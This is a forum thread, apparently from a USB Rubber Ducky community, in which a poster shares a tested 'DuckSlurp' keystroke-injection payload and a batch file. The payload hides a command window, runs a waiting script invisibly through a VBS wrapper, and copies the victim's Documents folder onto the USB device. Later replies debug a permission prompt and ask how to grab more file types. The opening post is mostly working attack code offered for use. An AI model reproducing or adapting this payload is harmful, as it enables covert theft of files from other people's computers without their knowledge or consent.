overwraith Posted July 6, 2013 Posted July 6, 2013 (edited) For anyone who has heard about pod slurping, which is to say an Ipod, this works exactly like that. Here is the website that I mostly based my work on: http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS Since the USB rubber ducky brings back autorun, it also brings back a form of pod slurping. To speed up this payload you could use a separate USB drive labeled "DUCKY" in a tandem ducky attack. Other USB drives mount instantly, and can be temporarily fused to the duck with a USB cable splitter. I have also been noticing that the Twin Duck firmware has been getting even faster in mounting the "DUCKY" drive, so the "RunEXE from SD" payload may soon become unnecessary. The following is a modification of "RunEXE from SD": REM Author: overwraith REM Name: DuckSlurp.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if Exist %DUCKYdrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. REM Remove the next two lines if you don't place your payloads in separate folders. STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\ ENTER STRING START %DUCKYdrive%\DuckSlurp.bat ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM STRING EXIT REM ENTER If you do not keep all your payload files in a separate folder on the ducky, and you do keep all files on the root, you will need to remove these lines: REM Remove the next two lines if you don't place your payloads in separate folders. STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\ ENTER In the batch file you will have to remove the small part that says "DuckSlurp" in the line: set destination=%~d0\DuckSlurp\%COMPUTERNAME% The following is the batch file which resides in the DuckSlurp folder: REM File: DuckSlurp.bat REM Purpose: a duck slurper payload, similar to pod slurping. REM Original post: http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS @echo off REM %0 path to the batch file REM ~d is the drive REM Located in DuckSlurp folder to seperate from other payloads. set destination=%~d0\DuckSlurp\%COMPUTERNAME% echo %destination% mkdir %destination% REM Had to remove support for previous OSes because there is a REM folder that is exactly the same on Windows 7, only access denied. REM Windows Vista, and Windows 7 if Exist %USERPROFILE%\Documents ( xcopy %USERPROFILE%\Documents %destination% ) @cls @exit This payload now works, and has been tested. Edited July 10, 2013 by overwraith Quote
mahorelee Posted July 10, 2013 Posted July 10, 2013 Seems like a great Payload. I tested it out and I found out that this version of the Run.exe does not work for me. It brings up a window asking me yes or no if I want to allow diskport to make changes. I plugged it into the other Run.exe code and everything ran fine. When the .bat is executed this is what happens. Quote
overwraith Posted July 10, 2013 Author Posted July 10, 2013 I'll have to find a larger USB drive and update this. Quote
overwraith Posted July 10, 2013 Author Posted July 10, 2013 It looks like I fixed the problem, recopy the code. I have edited my previous post. Quote
mahorelee Posted July 11, 2013 Posted July 11, 2013 Now it creates a folder with the computers name but does not copy anything. Here is a screenshot of when the bat file is ran by itself. Quote
overwraith Posted July 11, 2013 Author Posted July 11, 2013 Mine looks like its working, Just looks like it takes a long time to do anything. I have files moved onto my duck in their proper directory. Quote
mahorelee Posted July 11, 2013 Posted July 11, 2013 Huh, well I don't have the best luck with the Ducky so I'll just mess around with it. Nice post though! Quote
ocean99 Posted January 8, 2023 Posted January 8, 2023 Good day Sirs/Mams, Hi, questions can we add to copy the file .txt .pdf .word .exe? Can we do run multiples payloads in 1 single inject.bin file? What are the scripts to use to implement the multiple payloads? TIA Guys, Quote
dark_pyrro Posted January 10, 2023 Posted January 10, 2023 Digging up a 9+ year old post is quite and accomplishment. To copy specific file types, it's just to study basic copy operations and implement them as desired. Information on how to execute such copying is just a Google search away. It's not Ducky specific. It depends on the features available on the target. On the classic Ducky, only one (1) inject.bin can be used on each unique execution. However, it's possible to include several different operations in the same inject.bin. It all depends on what the goals are with the different stages of the payload/inject.bin. 1 Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.